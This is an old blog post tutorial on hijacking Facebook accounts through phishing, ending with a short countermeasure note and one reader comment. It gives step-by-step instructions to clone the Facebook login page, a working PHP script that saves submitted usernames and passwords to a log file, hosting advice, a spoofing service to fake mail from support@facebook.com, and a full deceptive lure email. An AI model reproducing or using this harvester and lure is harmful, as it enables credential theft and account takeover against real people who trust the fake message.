Monday, July 9, 2012

How To Hack Facebook Account | Phishing

In this tutorial we will discus how you can hack Facbook account password by phishing. Phishing is act of creating a replica of legitimate website for stealing passwords and credit card numbers etc. Here I will show you how you can create replica of facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password
.
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “Facebook” in file name and select “web page complete” from save as menu. Once done you will have a file named “Facebook.html” and a folder named “Facebook_files”. Folder will have several files in it, let them as it is and open Facebook.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
 

action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with

action= “mail.php”

Now open notepad type following code in it and create mail.php.

Code:


<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Now save it as mail.php and create an empty log.txt file. Now you'll need a free web hosting service that supports PHP. Go to http://www.100best-free-web-space.com/ and select service and plan that suits you. Now in root folder of your website create Facebook_files folder and upload all files in Facebook_files of your hard disk to it. Come back to root folder and upload Facebook.html, mail.php and log.txt in it. Change permission for log.txt that it can be seen by administrator only. Once done make Facebook.html your index page and make site live.

Now sign up with http://www.hoaxmail.co.uk/ it provides spoofed email service. Now create a message from support@facebook.com to your victim.


Sub: Invalid activity on your facebook account

Body:
Dear facebook user (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site>
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com,
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in log.txt file. Pleas note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.

Countermeasure:
You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.

1 comments:

z0ne said...

This was a good read. Only thing is the header redirect in the main.php causes an error.